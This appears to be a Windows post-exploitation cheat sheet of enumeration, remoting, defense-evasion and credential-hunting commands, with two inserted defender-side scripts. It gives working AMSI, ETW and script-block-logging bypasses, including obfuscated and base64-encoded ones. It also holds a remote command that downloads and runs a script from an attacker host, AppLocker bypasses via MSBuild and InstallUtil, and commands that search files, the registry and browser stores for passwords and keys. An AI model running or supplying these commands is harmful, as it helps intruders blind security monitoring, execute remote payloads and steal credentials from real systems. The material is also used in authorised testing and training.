Windows Command

User Enumeration

Quick Check (One-liner)

# Quick Windows enumeration
whoami /all && net user && net localgroup administrators && systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
  • List local users

    Get-LocalUser
  • List domain users

    Get-ADUser -Filter *
  • Get current user

    whoami
    $env:USERNAME
  • Get user groups

    whoami /groups
    Get-LocalGroup
    Get-ADGroupMember "Domain Admins"

System Information

systeminfo
Get-ComputerInfo
  • OS version

    [System.Environment]::OSVersion
    Get-WmiObject Win32_OperatingSystem
  • Architecture

    [System.Environment]::Is64BitOperatingSystem
    $env:PROCESSOR_ARCHITECTURE
  • Hostname

    hostname
    $env:COMPUTERNAME
  • Domain information

    Get-WmiObject Win32_ComputerSystem | Select Domain

Network Enumeration

  • Network interfaces

    ipconfig /all
    Get-NetIPAddress
    Get-NetIPConfiguration
  • Routing table

    route print
    Get-NetRoute
  • ARP table

    arp -a
    Get-NetNeighbor
  • Active connections

    netstat -ano
    Get-NetTCPConnection
  • DNS cache

    ipconfig /displaydns
    Get-DnsClientCache

Process and Service Enumeration

  • List running processes

    Get-Process
    tasklist /v
  • Enumerate Windows services

    Get-Service
    sc query
  • List scheduled tasks

    Get-ScheduledTask
    schtasks /query /fo LIST /v
  • List startup programs

    Get-CimInstance Win32_StartupCommand
    wmic startup get caption,command
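The three autostart surfaces listed in this section (services, scheduled tasks, Win32_StartupCommand) pulled into one review table with the resolved binary and its Authenticode status, as an added example that is not part of the original cheat sheet; the function names and the filter that skips the \Microsoft\ task folder are assumptions.

```powershell
function Get-AutostartInventory {
    # Pull the executable out of a command line such as
    # '"C:\Program Files\x\svc.exe" -k arg' or 'C:\Windows\foo.exe /x'.
    # An unquoted path with spaces resolves to its first token and is reported
    # as FileNotFound, which is itself the unquoted-service-path weakness.
    function Resolve-ExePath([string]$CommandLine) {
        if ([string]::IsNullOrWhiteSpace($CommandLine)) { return $null }
        $m = [regex]::Match($CommandLine, '^\s*"([^"]+)"|^\s*(\S+)')
        $p = if ($m.Groups[1].Success) { $m.Groups[1].Value } else { $m.Groups[2].Value }
        return [Environment]::ExpandEnvironmentVariables($p)
    }
    function New-Entry($Source, $Name, $Cmd, $Account) {
        $exe = Resolve-ExePath $Cmd
        $sig = if ($exe -and (Test-Path -LiteralPath $exe)) {
            (Get-AuthenticodeSignature -FilePath $exe).Status.ToString()
        } else { 'FileNotFound' }
        [pscustomobject]@{ Source = $Source; Name = $Name; Account = $Account
                           Executable = $exe; Signature = $sig; CommandLine = $Cmd }
    }
    # Services: Win32_Service carries the binary path and the logon account
    Get-CimInstance Win32_Service | ForEach-Object {
        New-Entry 'Service' $_.Name $_.PathName $_.StartName
    }
    # Scheduled tasks: one row per exec action; Microsoft's own folder is skipped to cut noise
    Get-ScheduledTask | Where-Object { $_.TaskPath -notlike '\Microsoft\*' } | ForEach-Object {
        $task = $_
        foreach ($a in $task.Actions) {
            if ($a.Execute) {
                New-Entry 'ScheduledTask' ($task.TaskPath + $task.TaskName) "$($a.Execute) $($a.Arguments)" $task.Principal.UserId
            }
        }
    }
    # Run keys and Startup folders, as surfaced by Win32_StartupCommand
    Get-CimInstance Win32_StartupCommand | ForEach-Object {
        New-Entry 'StartupCommand' $_.Name $_.Command $_.User
    }
}

# Anything whose signature is not 'Valid' deserves a closer look.
Get-AutostartInventory | Where-Object { $_.Signature -ne 'Valid' } | Format-Table -AutoSize
```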

Share Enumeration

  • List shares

    net share
    Get-SmbShare
    Get-WmiObject Win32_Share
  • Access shares

    net use \\target\share
    Get-SmbMapping
  • Find accessible shares on network

    Get-SmbShare -CimSession (Get-ADComputer -Filter *).Name

Remote Command Execution

  • Basic command execution

    Invoke-Command -ComputerName $rhost -ScriptBlock { whoami }
  • Multiple commands

    Invoke-Command -ComputerName $rhost -ScriptBlock { whoami; hostname; ipconfig }
  • Execute local script on remote

    Invoke-Command -ComputerName $rhost -FilePath .\script.ps1
  • Download and execute

    Invoke-Command -ComputerName $rhost -ScriptBlock {IEX(New-Object Net.WebClient).DownloadString("http://$lhost/script.ps1")}

PowerShell Remoting Cmdlets

  • Interactive Remote Session

    Enter-PSSession -ComputerName $rhost
  • Exit Remote Session

    Exit-PSSession
  • Run Command Remotely

    Invoke-Command -ComputerName $rhost -ScriptBlock {cmd}
  • Create persistent session

    $s = New-PSSession -ComputerName $rhost
  • Close session

    Remove-PSSession -Session $s
  • List active sessions

    Get-PSSession

Defense Evasion

AMSI Bypass

Bypass Antimalware Scan Interface to run malicious PowerShell

Memory Patching (One-liner)

[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

Obfuscated Version

$a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Context") {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf=@(0);[System.Runtime.InteropServices.Marshal]::Copy($buf,0,$ptr,1)

Matt Graeber's Method

$mem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(9076)
[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField("amsiSession","NonPublic,Static").SetValue($null, $null);[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField("amsiContext","NonPublic,Static").SetValue($null, [IntPtr]$mem)

Base64 Encoded One-liner

powershell -ep bypass -e WwBSAGUAZgBdAC4AQQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQAVAB5AHAAZQAoACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzACcAKQAuAEcAZQB0AEYAaQBlAGwAZAAoACcAYQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbGBsACwAJAB0AHIAdQBlACkA

Using Invisi-Shell

# Run PowerShell without logging or AMSI
.\RunWithPathAsAdmin.bat
.\RunWithRegistryNonAdmin.bat

ETW Bypass

Disable Event Tracing for Windows

[Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0)

Script Block Logging Bypass

$settings = [Ref].Assembly.GetType("System.Management.Automation.Utils").GetField("cachedGroupPolicySettings","NonPublic,Static").GetValue($null);
$settings["HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging"] = @{}
$settings["HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging"].Add("EnableScriptBlockLogging", "0")
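A defender-side check for the logging policies the two bypasses above target, as an added example that is not from the original cheat sheet: the first function reads the same ScriptBlockLogging policy key (plus ModuleLogging and Transcription), and the second confirms from inside the running session that a script block actually lands in the Operational log as event 4104. Function names and the one-minute lookback are assumptions.

```powershell
function Get-PowerShellLoggingPolicy {
    $base = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'
    $checks = @(
        @{ Name = 'ScriptBlockLogging'; Key = "$base\ScriptBlockLogging"; Value = 'EnableScriptBlockLogging' }
        @{ Name = 'ModuleLogging';      Key = "$base\ModuleLogging";      Value = 'EnableModuleLogging' }
        @{ Name = 'Transcription';      Key = "$base\Transcription";      Value = 'EnableTranscripting' }
    )
    foreach ($c in $checks) {
        $raw = $null
        if (Test-Path -LiteralPath $c.Key) {
            $raw = (Get-ItemProperty -LiteralPath $c.Key -ErrorAction SilentlyContinue).($c.Value)
        }
        [pscustomobject]@{
            Policy  = $c.Name
            Enabled = ($raw -eq 1)
            State   = if ($null -eq $raw) { 'not configured' } else { "value=$raw" }
        }
    }
}

# The cachedGroupPolicySettings bypass edits the in-process policy cache, not
# the registry, so a registry read alone cannot show that logging was switched
# off in a live session. Compile a script block carrying a unique marker and
# confirm that a 4104 event containing it reaches the Operational log.
function Test-ScriptBlockLoggingLive {
    $marker = "sbl-check-$([guid]::NewGuid().ToString('N'))"
    & ([scriptblock]::Create("'$marker' | Out-Null"))
    Start-Sleep -Milliseconds 500
    $filter = @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104
                 StartTime = (Get-Date).AddMinutes(-1) }
    $hit = Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -like "*$marker*" } | Select-Object -First 1
    return [bool]$hit
}

Get-PowerShellLoggingPolicy | Format-Table -AutoSize
"Script block logging live in this session: $(Test-ScriptBlockLoggingLive)"
```

Policy enabled but no live hit is the interesting combination: either the session has been tampered with or events are not reaching the log.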

AppLocker Bypass

Common Bypass Directories

# Default writable locations
C:\Windows\Tasks
C:\Windows\Temp
C:\Windows\tracing
C:\Windows\Registration\CRMLog
C:\Windows\System32\FxsTmp
C:\Windows\System32\com\dmp
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\PRINTERS
C:\Windows\System32\spool\SERVERS
C:\Windows\System32\spool\drivers\color
C:\Windows\System32\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\SysWOW64\Tasks
C:\Windows\SysWOW64\com\dmp

Execute from Bypass Locations

copy payload.exe C:\Windows\Tasks\
C:\Windows\Tasks\payload.exe

MSBuild Bypass

# Create .csproj file with embedded payload
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe payload.csproj

InstallUtil Bypass

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U payload.exe

File Hunting

Search for sensitive files on Windows systems

Search for Passwords

:: Search in current directory recursively
findstr /si password *.txt *.xml *.ini *.config *.cfg

:: Search in specific paths
findstr /spin "password" C:\Users\*.* 2>nul
findstr /spin "password" C:\inetpub\*.* 2>nul

:: Case-insensitive search for multiple terms
findstr /si /c:"password" /c:"passwd" /c:"pwd" /c:"secret" *.* 2>nul

PowerShell File Search

# Search for files containing passwords
Get-ChildItem -Path C:\Users -Include *.txt,*.ini,*.config,*.xml -Recurse -ErrorAction SilentlyContinue | 
  Select-String -Pattern "password|passwd|pwd|secret" | Select-Object Path,LineNumber,Line

# Find specific file types
Get-ChildItem -Path C:\ -Include *.kdbx,*.pfx,*.p12,*.ppk,*.pem -Recurse -ErrorAction SilentlyContinue

# Find files modified recently
Get-ChildItem -Path C:\Users -Recurse -ErrorAction SilentlyContinue | 
  Where-Object {$_.LastWriteTime -gt (Get-Date).AddDays(-7)}

Common Sensitive Files

:: Find config files
dir /s /b *.config *.ini *.xml *.txt 2>nul | findstr /i "password web.config app.config"

:: Find credential files
dir /s /b C:\Users\*password* C:\Users\*cred* C:\Users\*secret* 2>nul

:: Find SSH keys
dir /s /b C:\Users\*.ppk C:\Users\id_rsa C:\Users\.ssh 2>nul

:: Find browser credentials
dir /s /b "%APPDATA%\Microsoft\Credentials\*" 2>nul
dir /s /b "%LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data" 2>nul

Registry Credential Search

:: Search registry for passwords
reg query HKLM /f password /t REG_SZ /s 2>nul
reg query HKCU /f password /t REG_SZ /s 2>nul

:: Common credential locations
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" 2>nul
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP" 2>nul
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s 2>nul

See Also